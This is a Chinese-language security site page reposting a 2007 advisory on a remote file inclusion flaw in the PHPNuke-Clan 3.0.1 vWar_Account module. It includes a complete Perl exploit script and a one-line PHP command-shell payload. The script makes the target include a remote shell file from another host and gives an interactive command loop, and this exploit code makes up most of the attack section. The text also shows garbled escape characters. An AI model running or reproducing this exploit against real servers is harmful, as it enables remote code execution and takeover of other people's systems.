 |
|
 |
您现在的位置: 精品下载 >> 安全 >> 网络安全 >> 安全中心正文 |  用户登录  新用户注册 |
|
||||
| PHPNuke-Clan functions_common.php远程文件包含漏洞 | ||||
| 作者:佚名 安全中心来源:不详 点击数: 更新时间:2007-10-10 | ||||
PHPNuke-Clan functions_common.php 描述: PHPNuke-Clan functions_common.php远程文件包含漏洞 详细: PHPNuke-Clan是一款开放源码的社区内容管理系统。 PHPNuke-Clan的VWAR模块实现上存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。 PHPNuke-Clan的 modules/vWar_Account/includes/functions_common.php 没有正确过滤war_root参数值,导致攻击者可以通过从外部或本地资源包含PHP脚本来执行任意PHP代码。成功攻击要求必须启用了register_globals。 <*来源:uid0 (uid0@exploitercode.com) 链接:(http://secunia.com/advisories/19501/print/ *> 受影响系统: PHPNuke-Clan PHPNuke-Clan 3.0.1 攻击方法: 警 告 以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! #!/usr/bin/perl ## # PHPNuke-Clan 3.0.1 Remote File Inclusion Exploit # Bug Found By uid0 code by zod ## # (c) 2006 # ExploiterCode.com ## # usage: # perl pnc.pl <location of PNC> <cmd shell location> <cmd shell variable> # # perl pnc.pl http://site.com/PNC/ http://site.com/cmd.txt cmd # # cmd shell example: <?passthru($_GET[cmd]);?> # # cmd shell variable: ($_GET[cmd]); ## # hai to: nex, kutmaster, spic, cijfer ;P, ReZeN, wr0ck, blackhat-alliance.org, and / everyone else! # # special shout to [ill]will! ## # Contact: www.exploitercode.com irc.exploitercode.com uid0@exploitercode.com ## use LWP::UserAgent; $Path = $ARGV[0]; $Pathtocmd = $ARGV[1]; $cmdv = $ARGV[2]; if($Path!~/http:///// || $Pathtocmd!~/http:///// || !$cmdv) head(); while() { print "[shell] /$"; while(<STDIN>) { $cmd=$_; chomp($cmd); $xpl = LWP::UserAgent->new() or die; $req = HTTP::Request->new(GET / =>$Path.'modules/vWar_Account/includes/functions_common.php?vwar_root2='.$Pathtocmd.'? / &'.$cmdv.'='.$cmd)or die "/nCould Not connect/n"; $res = $xpl->request($req); $return = $res->content; $return =~ tr/[/n]/[ê]/; if (!$cmd) {print "/nPlease Enter a Command/n/n"; $return ="";} elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot / execute a blank command in <b>/) {print "/nCould Not Connect to cmd Host or Invalid / Command Variable/n";exit} elsif ($return =~/^<br.//>.<b>Fatal.error/) {print / "/nInvalid Command or No Return/n/n"} if($return =~ /(.+)<br.//>.<b>Warning.(.+)<br.//>.<b>Warning/) { $finreturn = $1; $finreturn=~ tr/[ê]/[/n]/; print "/r/n$finreturn/n/r"; last; } else {print "[shell] /$";}}}last; sub head() { print "/n============================================================================ / /r/n"; print " *PHPNuke-Clan 3.0.1 Remote File Inclusion Exploit*/r/n"; print "============================================================================/r / /n"; } sub usage() { head(); print " Usage: perl pnc.pl <location of PNC> <cmd shell location> <cmd shell / variable>/r/n/n"; print " <Site> - Full path to PNC ex: http://www.site.com/PNC/ / /r/n"; print " <cmd shell> - Path to cmd Shell e.g / http://www.different-site.com/cmd.txt /r/n"; print " <cmd variable> - Command / variable used in php shell /r/n"; print / "============================================================================/r/n"; / print " Bug Found by uid0/r/n"; print " www.exploitercode.com / irc.exploitercode.com #exploitercode/r/n"; print / "============================================================================/r/n"; / exit(); } 解决方案: 厂商补丁: PHPNuke-Clan ------------ 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: (http://www.phpnuke-clan.com/index.php |
网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)